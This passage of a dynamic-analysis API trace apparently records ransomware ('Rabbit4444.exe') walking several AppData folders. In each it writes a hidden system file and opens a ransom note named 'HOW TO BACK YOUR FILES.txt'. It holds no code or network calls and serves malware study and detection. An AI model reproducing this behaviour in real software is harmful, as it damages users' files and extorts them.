lpString2="Rabbit4444.exe") returned -1 [0066.946] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.946] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf138e61d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.946] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.946] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.946] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.946] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.946] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.946] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf138e61d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf138e61d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf138e61d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.947] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.947] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.947] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf138e61d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf138e61d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf138e61d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.947] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0066.947] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.947] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.947] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.948] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.948] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.948] CloseHandle (hObject=0x27c) returned 1 [0066.948] CloseHandle (hObject=0x228) returned 1 [0066.948] GetCurrentThreadId () returned 0xd98 [0066.948] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fc8 [0066.948] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory" [0066.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b508 | out: hHeap=0xe0000) returned 1 [0066.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fc0 | out: hHeap=0xe0000) returned 1 [0066.948] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory" [0066.948] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory\\" [0066.948] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0066.948] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.950] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.953] FlushFileBuffers (hFile=0x228) returned 1 [0066.953] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.954] CloseHandle (hObject=0x228) returned 1 [0066.956] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory") returned 105 [0066.956] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.956] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf13b4b39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0066.956] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.956] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.956] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.956] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.956] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf13b4b39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.956] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.956] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.956] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.956] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.956] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.956] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13b4b39, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13b4b39, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf13b4b39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.956] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.956] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.956] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13b4b39, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13b4b39, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf13b4b39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.956] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0066.956] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.956] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.957] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.957] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.957] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.957] CloseHandle (hObject=0x27c) returned 1 [0066.957] CloseHandle (hObject=0x228) returned 1 [0066.957] GetCurrentThreadId () returned 0xd98 [0066.957] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0066.957] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies" [0066.957] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b6c8 | out: hHeap=0xe0000) returned 1 [0066.957] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0066.958] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies" [0066.958] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies\\" [0066.958] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0066.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.958] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.961] FlushFileBuffers (hFile=0x228) returned 1 [0066.962] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.963] CloseHandle (hObject=0x228) returned 1 [0066.964] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies") returned 105 [0066.964] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.964] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf13b4b39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0066.964] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.964] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.964] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.964] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.964] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf13b4b39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.964] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.964] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.964] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.964] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.964] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.964] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13b4b39, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13b4b39, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf13b4b39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.964] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.964] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.964] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13b4b39, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13b4b39, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf13b4b39, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.965] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0066.965] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.965] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.965] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.965] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.966] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.966] CloseHandle (hObject=0x27c) returned 1 [0066.966] CloseHandle (hObject=0x228) returned 1 [0066.966] GetCurrentThreadId () returned 0xd98 [0066.966] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122088 [0066.966] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache" [0066.966] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0066.966] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122080 | out: hHeap=0xe0000) returned 1 [0066.966] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache" [0066.966] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache\\" [0066.966] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0066.966] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.969] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.972] FlushFileBuffers (hFile=0x228) returned 1 [0066.972] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.973] CloseHandle (hObject=0x228) returned 1 [0066.973] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache") returned 103 [0066.973] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.973] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf13daa80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0066.973] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.974] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.974] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.974] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.974] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x75e71ae4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf13daa80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.974] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.974] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.974] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.974] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.974] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.974] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13daa80, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13daa80, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf13daa80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, 